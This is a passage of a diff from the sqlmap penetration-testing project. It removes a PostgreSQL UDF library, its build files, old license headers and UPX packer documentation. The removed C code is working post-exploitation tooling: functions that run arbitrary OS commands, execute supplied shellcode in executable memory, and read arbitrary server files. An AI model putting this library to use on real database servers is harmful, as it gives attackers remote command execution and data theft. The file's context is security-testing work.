-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.ActiveCfg = Debug|Win32
-		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.Build.0 = Debug|Win32
-		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.ActiveCfg = Release|Win32
-		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,274 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-#ifdef SET_VARSIZE
-	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-#else
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-#endif
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
-
-#undef fopen
-
-PG_FUNCTION_INFO_V1(sys_fileread);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	int32 len;
-	int32 i, j;
-	char *filename;
-	char *result;
-	char *buffer;
-	char table[] = "0123456789ABCDEF";
-	FILE *file;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	filename = (char *)malloc(argv0_size + 1);
-
-	memcpy(filename, VARDATA(argv0), argv0_size);
-	filename[argv0_size] = '\0';
-	
-	file = fopen(filename, "rb");
-	if (!file)
-	{
-		PG_RETURN_NULL();
-	}
-	fseek(file, 0, SEEK_END);
-	len = ftell(file);
-	fseek(file, 0, SEEK_SET);
-
-	buffer=(char *)malloc(len + 1);
-	if (!buffer)
-	{
-		fclose(file);
-		PG_RETURN_NULL();
-	}
-
-	fread(buffer, len, 1, file);
-	fclose(file);
-
-	result = (char *)malloc(2*len + 1);
-	for (i=0, j=0; i<len; i++)
-	{
-		result[j++] = table[(buffer[i] >> 4) & 0x0f];
-		result[j++] = table[ buffer[i]	   & 0x0f];
-	}
-	result[j] = '\0';
-	
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-#ifdef SET_VARSIZE
-	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-#else
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-#endif
-	memcpy(VARDATA(result_text), result, strlen(result));
-	
-	free(result);
-	free(buffer);
-	free(filename);
-
-	PG_RETURN_POINTER(result_text);
-}

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj

@@ -1,194 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="8,00"
-	Name="lib_postgresqludf_sys"
-	ProjectGUID="{3527D58C-177A-47B3-981B-8104EBB3F943}"
-	RootNamespace="lib_postgresqludf_sys"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				AdditionalDependencies="postgres.lib"
-				AdditionalLibraryDirectories="$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
-				GenerateDebugInformation="true"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
-				RuntimeLibrary="2"
-				EnableFunctionLevelLinking="true"
-				WarningLevel="3"
-				DebugInformationFormat="0"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				AdditionalDependencies="postgres.lib"
-				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib;$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
-				GenerateDebugInformation="false"
-				SubSystem="0"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				OptimizeForWindows98="1"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\lib_postgresqludf_sys.c"
-				>
-			</File>
-		</Filter>
-		<Filter
-			Name="Header Files"
-			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
-			>
-		</Filter>
-		<Filter
-			Name="Resource Files"
-			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
-			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
-			>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>

lib/__init__.py

@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 pass

lib/contrib/__init__.py

@@ -1,25 +0,0 @@
-#!/usr/bin/env python
-
-"""
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-
-pass

lib/contrib/upx/doc/LICENSE

@@ -1,138 +0,0 @@
------BEGIN PGP SIGNED MESSAGE-----
-
-
-                 ooooo     ooo ooooooooo.   ooooooo  ooooo
-                 `888'     `8' `888   `Y88.  `8888    d8'
-                  888       8   888   .d88'    Y888..8P
-                  888       8   888ooo88P'      `8888'
-                  888       8   888            .8PY888.
-                  `88.    .8'   888           d8'  `888b
-                    `YbodP'    o888o        o888o  o88888o
-
-
-                    The Ultimate Packer for eXecutables
-          Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar
-               http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
-                          http://www.nexus.hu/upx
-                            http://upx.tsx.org
-
-
-PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN
-TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION.
-
-
-ABSTRACT
-========
-
-   UPX and UCL are copyrighted software distributed under the terms
-   of the GNU General Public License (hereinafter the "GPL").
-
-   The stub which is imbedded in each UPX compressed program is part
-   of UPX and UCL, and contains code that is under our copyright. The
-   terms of the GNU General Public License still apply as compressing
-   a program is a special form of linking with our stub.
-
-   As a special exception we grant the free usage of UPX for all
-   executables, including commercial programs.
-   See below for details and restrictions.
-
-
-COPYRIGHT
-=========
-
-   UPX and UCL are copyrighted software. All rights remain with the authors.
-
-   UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
-   UPX is Copyright (C) 1996-2000 Laszlo Molnar
-
-   UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer
-
-
-GNU GENERAL PUBLIC LICENSE
-==========================
-
-   UPX and the UCL library are free software; you can redistribute them
-   and/or modify them under the terms of the GNU General Public License as
-   published by the Free Software Foundation; either version 2 of
-   the License, or (at your option) any later version.
-
-   UPX and UCL are distributed in the hope that they will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-   GNU General Public License for more details.
-
-   You should have received a copy of the GNU General Public License
-   along with this program; see the file COPYING.
-
-
-SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES
-============================================
-
-   The stub which is imbedded in each UPX compressed program is part
-   of UPX and UCL, and contains code that is under our copyright. The
-   terms of the GNU General Public License still apply as compressing
-   a program is a special form of linking with our stub.
-
-   Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special
-   permission to freely use and distribute all UPX compressed programs
-   (including commercial ones), subject to the following restrictions:
-
-   1. You must compress your program with a completely unmodified UPX
-      version; either with our precompiled version, or (at your option)
-      with a self compiled version of the unmodified UPX sources as
-      distributed by us.
-   2. This also implies that the UPX stub must be completely unmodfied, i.e.
-      the stub imbedded in your compressed program must be byte-identical
-      to the stub that is produced by the official unmodified UPX version.
-   3. The decompressor and any other code from the stub must exclusively get
-      used by the unmodified UPX stub for decompressing your program at
-      program startup. No portion of the stub may get read, copied,
-      called or otherwise get used or accessed by your program.
-
-
-ANNOTATIONS
-===========
-
-  - You can use a modified UPX version or modified UPX stub only for
-    programs that are compatible with the GNU General Public License.
-
-  - We grant you special permission to freely use and distribute all UPX
-    compressed programs. But any modification of the UPX stub (such as,
-    but not limited to, removing our copyright string or making your
-    program non-decompressible) will immediately revoke your right to
-    use and distribute a UPX compressed program.
-
-  - UPX is not a software protection tool; by requiring that you use
-    the unmodified UPX version for your proprietary programs we
-    make sure that any user can decompress your program. This protects
-    both you and your users as nobody can hide malicious code -
-    any program that cannot be decompressed is highly suspicious
-    by definition.
-
-  - You can integrate all or part of UPX and UCL into projects that
-    are compatible with the GNU GPL, but obviously you cannot grant
-    any special exceptions beyond the GPL for our code in your project.
-
-  - We want to actively support manufacturers of virus scanners and
-    similar security software. Please contact us if you would like to
-    incorporate parts of UPX or UCL into such a product.
-
-
-
-Markus F.X.J. Oberhumer                   Laszlo Molnar
-markus.oberhumer@jk.uni-linz.ac.at        ml1050@cdata.tvnet.hu
-
-Linz, Austria, 25 Feb 2000
-
-
-
------BEGIN PGP SIGNATURE-----
-Version: 2.6.3ia
-Charset: noconv
-
-iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI
-wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf
-dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx
-OO03+ojZdO8=
-=CS52
------END PGP SIGNATURE-----

lib/contrib/upx/doc/README

@@ -1,142 +0,0 @@
-                 ooooo     ooo ooooooooo.   ooooooo  ooooo
-                 `888'     `8' `888   `Y88.  `8888    d8'
-                  888       8   888   .d88'    Y888..8P
-                  888       8   888ooo88P'      `8888'
-                  888       8   888            .8PY888.
-                  `88.    .8'   888           d8'  `888b
-                    `YbodP'    o888o        o888o  o88888o
-
-
-                    The Ultimate Packer for eXecutables
-   Copyright (c) 1996-2008 Markus Oberhumer, Laszlo Molnar & John Reiser
-                        http://upx.sourceforge.net
-
-
-
-WELCOME
-=======
-
-Welcome to UPX !
-
-Please don't forget to read the file LICENSE - UPX is distributed
-under the GNU General Public License (GPL) with special exceptions
-allowing the distribution of all compressed executables, including
-commercial programs.
-
-
-INTRODUCTION
-============
-
-UPX is an advanced executable file compressor. UPX will typically
-reduce the file size of programs and DLLs by around 50%-70%, thus
-reducing disk space, network load times, download times and
-other distribution and storage costs.
-
-Programs and libraries compressed by UPX are completely self-contained
-and run exactly as before, with no runtime or memory penalty for most
-of the supported formats.
-
-UPX supports a number of different executable formats, including
-Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs,
-and Linux executables and kernels.
-
-UPX is free software distributed under the term of the GNU General
-Public License. Full source code is available.
-
-UPX may be distributed and used freely, even with commercial applications.
-See the UPX License Agreement for details.
-
-UPX is rated number one in the well known Archive Comparison Test. Visit
-http://compression.ca/ .
-
-UPX aims to be Commercial Quality Freeware.
-
-
-SHORT DOCUMENTATION
-===================
-
-'upx program.exe' will compress a program or DLL. For best compression
-results try 'upx --brute program.exe'.
-
-Please see the file UPX.DOC for the full documentation. The files
-NEWS and BUGS also contain various tidbits of information.
-
-
-DISCLAIMER
-==========
-
-UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.
-
-Having said that, we think that UPX is quite stable now. Indeed we
-have compressed lots of files without any problems. Also, the
-current version has undergone several months of beta testing -
-actually it's almost 8 years since our first public beta.
-
-This is the first production quality release, and we plan that future
-releases will be backward compatible with this version.
-
-Please report all problems or suggestions to the authors. Thanks.
-
-
-THE FUTURE
-==========
-
-  - We'd really love to support handheld systems like the PalmPilot because
-    compression makes a lot of sense here. And - because of the atari/tos
-    format - we already have a working decompressor in 68000 assembly.
-    Unfortunately we know next to nothing about the operating system
-    architecture of such handhelds, so we need some information from
-    an expert. Please contact us if you think you can help.
-
-  - The Linux approach could probably get ported to a lot of other Unix
-    variants, at least for other i386 architectures it shouldn't be too
-    much work. If someone sends me a fresh hard disk and an official
-    FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-)
-
-  - We will *NOT* add any sort of protection and/or encryption.
-    This only gives people a false feeling of security because
-    by definition all protectors/compressors can be broken.
-    And don't trust any advertisement of authors of other executable
-    compressors about this topic - just do a websearch on "unpackers"...
-
-  - Fix all remaining bugs - keep your reports coming ;-)
-
-  - See the file PROJECTS in the source code distribution if you want
-    to contribute.
-
-
-COPYRIGHT
-=========
-
-Copyright (C) 1996-2008 Markus Franz Xaver Johannes Oberhumer
-Copyright (C) 1996-2008 Laszlo Molnar
-Copyright (C) 2000-2008 John F. Reiser
-
-This program may be used freely, and you are welcome to
-redistribute it under certain conditions.
-
-This program is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-UPX License Agreement for more details.
-
-You should have received a copy of the UPX License Agreement along
-with this program; see the file LICENSE. If not, visit the UPX home page.
-
-
-Share and enjoy,
-Markus & Laszlo
-
-
-   Markus F.X.J. Oberhumer              Laszlo Molnar
-   <markus@oberhumer.com>               <ml1050@users.sourceforge.net>
-
-
-
-[ The term UPX is a shorthand for the Ultimate Packer for eXecutables
-  and holds no connection with potential owners of registered trademarks
-  or other rights. ]
-
-[ Feel free to contact us if you have commercial compression requirements
-  or interesting job offers. ]
-

lib/contrib/upx/doc/upx.html

@@ -1,888 +0,0 @@
-<?xml version="1.0" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<title>upx - compress or expand executable files</title>
-<meta http-equiv="content-type" content="text/html; charset=utf-8" />
-<link rev="made" href="mailto:root@localhost" />
-</head>
-
-<body style="background-color: white">
-
-<p><a name="__index__"></a></p>
-<!-- INDEX BEGIN -->
-<!--
-
-<ul>
-
-  <li><a href="#name">NAME</a></li>
-  <li><a href="#synopsis">SYNOPSIS</a></li>
-  <li><a href="#abstract">ABSTRACT</a></li>
-  <li><a href="#disclaimer">DISCLAIMER</a></li>
-  <li><a href="#description">DESCRIPTION</a></li>
-  <li><a href="#commands">COMMANDS</a></li>
-  <ul>
-
-    <li><a href="#compress">Compress</a></li>
-    <li><a href="#decompress">Decompress</a></li>
-    <li><a href="#test">Test</a></li>
-    <li><a href="#list">List</a></li>
-  </ul>
-
-  <li><a href="#options">OPTIONS</a></li>
-  <li><a href="#compression_levels___tuning">COMPRESSION LEVELS &amp; TUNING</a></li>
-  <li><a href="#overlay_handling_options">OVERLAY HANDLING OPTIONS</a></li>
-  <li><a href="#environment">ENVIRONMENT</a></li>
-  <li><a href="#notes_for_the_supported_executable_formats">NOTES FOR THE SUPPORTED EXECUTABLE FORMATS</a></li>
-  <ul>
-
-    <li><a href="#notes_for_atari_tos">NOTES FOR ATARI/TOS</a></li>
-    <li><a href="#notes_for_bvmlinuz_i386">NOTES FOR BVMLINUZ/I386</a></li>
-    <li><a href="#notes_for_dos_com">NOTES FOR DOS/COM</a></li>
-    <li><a href="#notes_for_dos_exe">NOTES FOR DOS/EXE</a></li>
-    <li><a href="#notes_for_dos_sys">NOTES FOR DOS/SYS</a></li>
-    <li><a href="#notes_for_djgpp2_coff">NOTES FOR DJGPP2/COFF</a></li>
-    <li><a href="#notes_for_linux__general_">NOTES FOR LINUX [general]</a></li>
-    <li><a href="#notes_for_linux_elf386">NOTES FOR LINUX/ELF386</a></li>
-    <li><a href="#notes_for_linux_sh386">NOTES FOR LINUX/SH386</a></li>
-    <li><a href="#notes_for_linux_386">NOTES FOR LINUX/386</a></li>
-    <li><a href="#notes_for_ps1_exe">NOTES FOR PS1/EXE</a></li>
-    <li><a href="#notes_for_rtm32_pe_and_arm_pe">NOTES FOR RTM32/PE and ARM/PE</a></li>
-    <li><a href="#notes_for_tmt_adam">NOTES FOR TMT/ADAM</a></li>
-    <li><a href="#notes_for_vmlinuz_386">NOTES FOR VMLINUZ/386</a></li>
-    <li><a href="#notes_for_watcom_le">NOTES FOR WATCOM/LE</a></li>
-    <li><a href="#notes_for_win32_pe">NOTES FOR WIN32/PE</a></li>
-  </ul>
-
-  <li><a href="#diagnostics">DIAGNOSTICS</a></li>
-  <li><a href="#bugs">BUGS</a></li>
-  <li><a href="#authors">AUTHORS</a></li>
-  <li><a href="#copyright">COPYRIGHT</a></li>
-</ul>
--->
-<!-- INDEX END -->
-
-<p>
-</p>
-<h1><a name="name">NAME</a></h1>
-<p>upx - compress or expand executable files</p>
-<p>
-</p>
-<hr />
-<h1><a name="synopsis">SYNOPSIS</a></h1>
-<p><strong>upx</strong> [&nbsp;<em>command</em>&nbsp;] [&nbsp;<em>options</em>&nbsp;] <em>filename</em>...</p>
-<p>
-</p>
-<hr />
-<h1><a name="abstract">ABSTRACT</a></h1>
-<pre>
-                    The Ultimate Packer for eXecutables
-   Copyright (c) 1996-2008 Markus Oberhumer, Laszlo Molnar &amp; John Reiser
-                        <a href="http://upx.sourceforge.net">http://upx.sourceforge.net</a></pre>
-<p><strong>UPX</strong> is a portable, extendable, high-performance executable packer for
-several different executable formats. It achieves an excellent compression
-ratio and offers <em>*very*</em> fast decompression. Your executables suffer
-no memory overhead or other drawbacks for most of the formats supported,
-because of in-place decompression.</p>
-<p>While you may use <strong>UPX</strong> freely for both non-commercial and commercial
-executables (for details see the file LICENSE), we would highly
-appreciate if you credit <strong>UPX</strong> and ourselves in the documentation,
-possibly including a reference to the <strong>UPX</strong> home page. Thanks.</p>
-<p>[ Using <strong>UPX</strong> in non-OpenSource applications without proper credits
-is considered not politically correct ;-) ]</p>
-<p>
-</p>
-<hr />
-<h1><a name="disclaimer">DISCLAIMER</a></h1>
-<p><strong>UPX</strong> comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE.</p>
-<p>This is the first production quality release, and we plan that future 1.xx
-releases will be backward compatible with this version.</p>
-<p>Please report all problems or suggestions to the authors. Thanks.</p>
-<p>
-</p>
-<hr />
-<h1><a name="description">DESCRIPTION</a></h1>
-<p><strong>UPX</strong> is a versatile executable packer with the following features:</p>
-<pre>
-  - excellent compression ratio: compresses better than zip/gzip,
-      use UPX to decrease the size of your distribution !</pre>
-<pre>
-  - very fast decompression: about 10 MiB/sec on an ancient Pentium 133,
-      about 200 MiB/sec on an Athlon XP 2000+.</pre>
-<pre>
-  - no memory overhead for your compressed executables for most of the
-      supported formats</pre>
-<pre>
-  - safe: you can list, test and unpack your executables
-      Also, a checksum of both the compressed and uncompressed file is
-      maintained internally.</pre>
-<pre>
-  - universal: UPX can pack a number of executable formats:
-      * atari/tos
-      * bvmlinuz/386    [bootable Linux kernel]
-      * djgpp2/coff
-      * dos/com
-      * dos/exe
-      * dos/sys
-      * linux/386
-      * linux/elf386
-      * linux/sh386
-      * ps1/exe
-      * rtm32/pe
-      * tmt/adam
-      * vmlinuz/386     [bootable Linux kernel]
-      * vmlinux/386
-      * watcom/le (supporting DOS4G, PMODE/W, DOS32a and CauseWay)
